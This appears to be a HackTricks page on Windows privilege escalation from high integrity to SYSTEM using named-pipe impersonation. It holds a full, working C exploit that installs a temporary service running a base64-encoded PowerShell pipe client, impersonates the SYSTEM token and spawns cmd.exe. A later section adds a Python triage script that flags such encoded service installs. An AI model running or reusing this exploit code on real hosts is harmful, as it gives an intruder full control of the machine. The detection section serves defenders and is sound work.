# From High Integrity to SYSTEM with Named Pipes

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF format**, check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**Telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* Share your hacking tricks by submitting PRs to the [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub repositories.

</details>

**Code flow:**

1. Create a new named pipe
2. Create and start a service that connects to the created pipe and writes to it. The service binary runs the following PS code, passed as an encoded command: `$pipe = new-object System.IO.Pipes.NamedPipeClientStream("piper"); $pipe.Connect(); $sw = new-object System.IO.StreamWriter($pipe); $sw.WriteLine("Go"); $sw.Dispose();`
3. The pipe server receives the data written by the client (the service), calls ImpersonateNamedPipeClient and waits for the service to finish
4. Finally, spawn a new _cmd.exe_ using the token obtained from the service

{% hint style="warning" %}
If you do not have enough privileges, the exploit may hang and never return.
{% endhint %}

```c
#include <windows.h>
#include <stdio.h>

#pragma comment (lib, "advapi32")
#pragma comment (lib, "kernel32")

#define PIPESRV "PiperSrv"
#define MESSAGE_SIZE 512

int ServiceGo(void) {
    SC_HANDLE scManager;
    SC_HANDLE scService;

    scManager = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
    if (scManager == NULL) {
        return FALSE;
    }

    // create Piper service: its binary path runs the encoded PowerShell pipe client
    scService = CreateServiceA(scManager, PIPESRV, PIPESRV, SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, "C:\\Windows\\System32\\cmd.exe /r powershell.exe -EncodedCommand JABwAGkAcABlACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFAAaQBwAGUAcwAuAE4AYQBtAGUAZABQAGkAcABlAEMAbABpAGUAbgB0AFMAdAByAGUAYQBtACgAIgBwAGkAcABlAHIAIgApADsAIAAkAHAAaQBwAGUALgBDAG8AbgBuAGUAYwB0ACgAKQA7ACAAJABzAHcAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AVwByAGkAdABlAHIAKAAkAHAAaQBwAGUAKQA7ACAAJABzAHcALgBXAHIAaQB0AGUATABpAG4AZQAoACIARwBvACIAKQA7ACAAJABzAHcALgBEAGkAcwBwAG8AcwBlACgAKQA7AA==", NULL, NULL, NULL, NULL, NULL);
    if (scService == NULL) {
        //printf("[!] CreateServiceA() failed: [%d]\n", GetLastError());
        CloseServiceHandle(scManager);
        return FALSE;
    }

    // launch it
    StartService(scService, 0, NULL);

    // wait a bit and then cleanup
    Sleep(10000);
    DeleteService(scService);

    CloseServiceHandle(scService);
    CloseServiceHandle(scManager);
    return TRUE;
}

int main() {
    LPCSTR sPipeName = "\\\\.\\pipe\\piper";
    HANDLE hSrvPipe;
    HANDLE th;
    BOOL bPipeConn;
    char pPipeBuf[MESSAGE_SIZE];
    DWORD dBRead = 0;

    HANDLE hImpToken;
    HANDLE hNewToken;
    STARTUPINFOW si;
    PROCESS_INFORMATION pi;

    // open pipe (the name must match the one used by the PowerShell client)
    hSrvPipe = CreateNamedPipeA(sPipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE | PIPE_WAIT, PIPE_UNLIMITED_INSTANCES, 1024, 1024, 0, NULL);
    if (hSrvPipe == INVALID_HANDLE_VALUE) {
        return -3;
    }

    // create and run service
    th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)ServiceGo, NULL, 0, 0);

    // wait for the connection from the service (blocks forever if the service never connects)
    bPipeConn = ConnectNamedPipe(hSrvPipe, NULL);
    if (bPipeConn) {
        // a client must have written to the pipe before it can be impersonated
        ReadFile(hSrvPipe, pPipeBuf, MESSAGE_SIZE, &dBRead, NULL);

        // impersonate the service (SYSTEM)
        if (ImpersonateNamedPipeClient(hSrvPipe) == 0) {
            return -1;
        }

        // wait for the service to cleanup
        WaitForSingleObject(th, INFINITE);

        // get a handle to impersonated token
        if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, &hImpToken)) {
            return -2;
        }

        // create new primary token for new process
        if (!DuplicateTokenEx(hImpToken, TOKEN_ALL_ACCESS, NULL, SecurityDelegation, TokenPrimary, &hNewToken)) {
            return -4;
        }

        //Sleep(20000);
        // spawn cmd.exe as full SYSTEM user
        ZeroMemory(&si, sizeof(si));
        si.cb = sizeof(si);
        ZeroMemory(&pi, sizeof(pi));
        if (!CreateProcessWithTokenW(hNewToken, LOGON_NETCREDENTIALS_ONLY, L"cmd.exe", NULL, NULL, NULL, NULL, &si, &pi)) {
            return -5;
        }

        // revert back to original security context
        RevertToSelf();
    }

    return 0;
}
```
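From the defender's side, the artefact this sequence leaves on a host is a freshly installed service whose ImagePath launches PowerShell with an encoded command that does nothing but connect to a named pipe and write one line. The following triage script is an added example, not code from the page or from HackTricks: it takes service-install records (on a real host these come from the System log, event ID 7045, "A service was installed in the system"; the dict field names used here are this example's own simplification), decodes any `-EncodedCommand` payload (it also accepts the abbreviated forms PowerShell takes, such as `-e` and `-enc`, and pwsh's `-ec`), and flags those whose decoded script opens a named pipe as a client. The sample records are constructed; the first one carries the exact encoded command from the `CreateServiceA` call above, so the script also serves to check what that blob decodes to.

```python
"""Triage service-install records for an encoded PowerShell named-pipe client.

Added example for this page, not the page's own code. Field names of the
records and the sample data are constructed for the example.
"""
import base64
import re

# Encoded command copied from the page's CreateServiceA call (base64 of UTF-16LE).
PAGE_ENCODED = (
    "JABwAGkAcABlACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAu"
    "AFAAaQBwAGUAcwAuAE4AYQBtAGUAZABQAGkAcABlAEMAbABpAGUAbgB0AFMAdAByAGUAYQBtACgA"
    "IgBwAGkAcABlAHIAIgApADsAIAAkAHAAaQBwAGUALgBDAG8AbgBuAGUAYwB0ACgAKQA7ACAAJABz"
    "AHcAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIA"
    "ZQBhAG0AVwByAGkAdABlAHIAKAAkAHAAaQBwAGUAKQA7ACAAJABzAHcALgBXAHIAaQB0AGUATABp"
    "AG4AZQAoACIARwBvACIAKQA7ACAAJABzAHcALgBEAGkAcwBwAG8AcwBlACgAKQA7AA=="
)

# Constructed 7045-style records: the page's service, a normal svchost service, and a
# constructed encoded command that runs "Get-Date" without touching any pipe.
SAMPLE_EVENTS = [
    {"service": "PiperSrv",
     "image_path": "C:\\Windows\\System32\\cmd.exe /r powershell.exe -EncodedCommand " + PAGE_ENCODED},
    {"service": "Dhcp",
     "image_path": "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted"},
    {"service": "InventoryAgent",
     "image_path": "powershell.exe -enc " + base64.b64encode("Get-Date".encode("utf-16-le")).decode()},
]

# "-flag value" pairs on the command line; the value must look like base64.
ARG_RE = re.compile(r"-([A-Za-z]+)\s+([A-Za-z0-9+/=]+)")
# Named-pipe client usage inside a decoded script: the .NET class, or a \\.\pipe\<name> path.
PIPE_RE = re.compile(r'NamedPipeClientStream\(\s*"([^"]+)"|\\\\\.\\pipe\\([\w.\-]+)', re.I)


def decode_encoded_command(image_path):
    """Return the decoded script if image_path runs PowerShell with an encoded command, else None.

    PowerShell accepts any prefix of EncodedCommand (-e, -en, -enc, ...) and pwsh also
    accepts -ec. The payload is base64 of UTF-16LE text, so a value that does not decode
    that way (e.g. the argument of -ExecutionPolicy) is ignored.
    """
    lowered = image_path.lower()
    if "powershell" not in lowered and "pwsh" not in lowered:
        return None
    for flag, value in ARG_RE.findall(image_path):
        f = flag.lower()
        if not (f == "ec" or "encodedcommand".startswith(f)):
            continue
        try:
            script = base64.b64decode(value, validate=True).decode("utf-16-le")
        except ValueError:  # covers binascii.Error and UnicodeDecodeError
            continue
        if all(c.isprintable() or c in "\r\n\t" for c in script):
            return script
    return None


def analyze(events):
    """Annotate every record with the decoded script (if any) and the pipe it connects to."""
    findings = []
    for ev in events:
        script = decode_encoded_command(ev["image_path"])
        pipe = None
        if script:
            m = PIPE_RE.search(script)
            if m:
                pipe = m.group(1) or m.group(2)
        findings.append({"service": ev["service"], "script": script, "pipe_name": pipe})
    return findings


def suspicious(events):
    """Records worth an alert: a new service whose encoded payload is a named-pipe client."""
    return [f for f in analyze(events) if f["pipe_name"] is not None]


if __name__ == "__main__":
    for f in suspicious(SAMPLE_EVENTS):
        print(f"[!] service '{f['service']}' connects to pipe '{f['pipe_name']}':")
        print("    " + f["script"])
```

The pipe name recovered from the payload (`piper` here) is the value to pivot on next: the process that created the server end of that pipe is the one that ends up holding the SYSTEM token, and the service itself is deleted ten seconds after it starts, so the install event is often the only trace that survives.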

